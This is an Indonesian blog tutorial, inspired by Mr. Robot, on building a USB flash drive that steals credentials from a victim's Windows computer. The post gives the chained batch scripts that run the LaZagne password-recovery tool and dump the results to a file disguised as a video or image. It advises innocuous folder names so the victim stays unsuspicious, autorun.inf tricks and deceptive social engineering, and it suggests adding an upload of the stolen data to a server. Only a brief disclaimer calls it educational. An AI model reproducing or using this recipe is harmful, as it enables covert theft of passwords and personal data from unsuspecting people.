18.1.17

Mencuri Data dengan USB Flashdisk ala Mr. Robots

Sekitar seminggu yang lalu tertarik dengan iklan iFlix yang menampilkan serial Mr. Robots. Akhirnya memutuskan untuk membeli paket perdana Indosat Ooreedoo (Im3) yang seharga 50ribuan dengan isi 3Gb siang 3Gb malam + bonus subscription iFlix 3 bulan. Tidak butuh paket datanya, cuma butuh subscribenya saja, nonton-nya lewat jaringan WiFi saja.

Dari serial tv Mr. Robot ini ada adegan peretasan menggunakan media USB Flashdrive (penyebutan Flashdisk di judul sebenarnya salah, saya pakai demi memudahkan anda menemukan tutorial ini) yang berisi mallware. Mungkinkah? Tentu saja mungkin. Sebagai contoh, akan saya tunjukkan bagaimana cara mencuri data seperti email, password wifi yang tersimpan di PC target. Meskipun tidak sama persis dengan metode hacking Mr. Robots dalam serial tetsebut.



Data yang didapatkan bisa berupa data kartu kredit, password akun sosmed, dan bisa jadi anda mendapatkan password akun PayPal jika beruntung. :p Saya ingatkan, ini hanya pembelajaran saja agar anda bisa waspada akan keamanan data yang anda span di komputer pribafi, utamanya dengan OS Windows. Saya tidak bertanggung jawab atas penyalahgunaan tutorial untuk perbuatan melanggar hukum yang akan anda lakukan.



Mempersiapkan Peralatan Tempur


Seperti dalam serial Mr. Robots, anda juga membutuhkan tool atau software yang dapat berjalan otomatis saat tersambung ke komputer. Fungsi software atau tool ini untuk mengpulkan data sensitif yang tersimpan dalam komputer korban. Tool yang bisa dipakai adalah LaZagne.


Tool atau software LaZagne di atas tersedia untuk beberapa platform. Download untuk OS Windows. Karena akan anda gunakan untuk mencuri data di komputer OS Windows.

Dan tentu saja sebuah USB Flashdrive sebagai media hacking sekaligus penyimpanan data sensitif hasil curian. Kapasitas bisa berapa saja asal bisa menampung LaZagne dan data yang akan dicuri dari komputer korban.

Pemasangan Tool Hacking di USB Flashdrive


Tancapkan USB Flashdrive anda dan kosongkan. Buat folder baru dengan nama yang biasa saja dan tidak mencolok, misalnya "tahi" atau "skripsi". Tujuannya agar pemilik komputer tidak curiga. Dalam folder tersebut, buat lagi folder bernama "files"

Ekstrak file zip software LaZagne yang sudah anda download sebelumnya di komputer. Dan ambil file excetutable laZagne.exe kedalam folder files yang sudah anda buat sebelumnya.

Ok, software berbahaya ini sudah siap beraksi. Tetapi software ini tidak akan berjalan dengan sendirinya. Butuh pemicu yang akan menjalankan sotware ini secara otimatis.

Untuk memicu tool laZagne bisa menghunakan file batch command promt (.bat) yang berisi perintah "start" yang memerintah komputer agar menjalankan sesuatu. Caranya? Buka notepad dan ketik kode seperti di bawah:
@echo off
cls
cd skripsi/files/
start baru.bat

Simpan kode yang anda tulis dengan nama start.bat di luar folder di dalam Flashdrive anda.

Code di atas bisa di terjemahkan sebagai berikut: jangan tampilkan apapun di layar command prompt (cmd), bersihkan layar cmd, pindah ke folder tahi/files/ di Flashdrive dan jalankan file baru.bat.

File start.bat ini hanya sebagai umpan untuk menjalankan kode lanjutan yang ada dalam file exploit.bat yang akan anda buat didalam folder /skripsi/files/. Lagi-lagi, ini agar pemilik komputer target tidak curiga.

Lanjutkan dengan membuat kode baru dengan notepad dengan kode seperti di bawah ini:
@echo off
cls
start main.bat


Simpan kode diatas dengan nama baru.bat. Kok cuma itu? Kan sama saja dengan sebelumnya? Iya memang sama. Tujuannya juga sama. Hanya target-nya kini bernama main.bat

Buat lagi notepad baru dan kode exploitasi yang sesungguhnya:

laZagne.exe all > data_sensitif.dat


Perintah dalam kode di atas meminta komputer untuk menjalankan tool hacking laZagne (laZagne.exe) dengan semua fiturnya (all) dan menulis hasilnya pada file data_sensitif.dat dalam lokasi yang sama.

Anda bisa mengganti nama file data_sensitif.dat menjadi apapun terserah anda, misalnya saja data.mpeg atau data.jpeg. penggatian nama menjadi mpeg atau jpeg ini tidak berarti anda bisa menyimpan data curian dalam bentuk video atau gambar. Tujuannya hanya untuk menyamarkan. Dan jika ada yang berusaha membuka file tersebut tentu tidak bisa karena memang bukan file video maupun gambar. Untuk membuka data hasil hacking anda bisa membukanya dengan klik kanan open with dan pilih notepad.



halaman utama Flashdisk



Eksekusi Komputer Target


Pada prakteknya, anda hanya butuh untuk meyakinkan pemilik komputer target agar menjalankan file batch start.bat yang ada di dalam flashdrive agar anda bisa mencuri datanya dengan "sukarela". Kecuali anda bisa mengaksesnya tanpa ijin atau memang dijinkan untuk memakai komputer korban.

Namun jika anda tidak mempunyai akses langsung ke komputer, anda bisa memaksa agar file start.bat dijalankan secara otomatis dengan membuat file autorun.inf. Lagi-lagi teknik social enginering anda di butuhkan untuk meyakinkan korban agar mau menuruti pop-up peringatan yang muncul karena saat ini Windows sudah tidak selemah dulu yang akan menjalankan perintah apapun dari autorun.inf.

Sudah itu saja yang anda perlu lakukan. Teknik ini bisa sangat sukses atau gagal total tergantung kemahiran social engineering anda (baca: berbohong, meyakinkan dan menipu) dan juga tingkat ke-unyu-an pemilik komputer target.

Dan bagi Anda pembaca yang merasa dirinya unyu, semoga bisa memberi anda pengetahuan agar tidak gampang percaya. Kepada teman teknisi anda sekalipun anda layak curiga karena biasanya teman seperti ini banyak yang usil.

Kalau anda merujuk persis seperti peretasan yang ada dilakukan Darlene dalam serial Mr. Robots anda butuh server yang menampung data curiam dan modifikasi script/kode dalam main.bat agar bisa memeberi perintah ke komputer untuk terkoneksi dengan internet dan meng-upload file tersubut ke server anda.
Disqus Comments